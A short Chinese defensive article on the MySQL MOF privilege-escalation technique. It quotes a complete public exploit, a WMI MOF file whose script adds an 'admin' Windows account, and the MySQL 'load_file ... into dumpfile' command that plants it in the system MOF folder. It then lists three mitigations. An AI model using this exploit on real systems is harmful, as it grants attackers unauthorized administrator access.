Mysql mof扩展漏洞防范方法
Mysql mof扩展漏洞防范方法
网上公开的一些利用代码:
#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2″;
Name = “filtP2″;
Query = “Select * From __InstanceModificationEvent ”
“Where TargetInstance Isa \”Win32_LocalTime\” ”
“And TargetInstance.Second = 5″;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2″;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
连接mysql数据库后执行:
select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法:
1、mysql用户权限控制,禁止 "load_file"、"dumpfile"等函数
2、禁止使用"WScript.Shel"组件
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER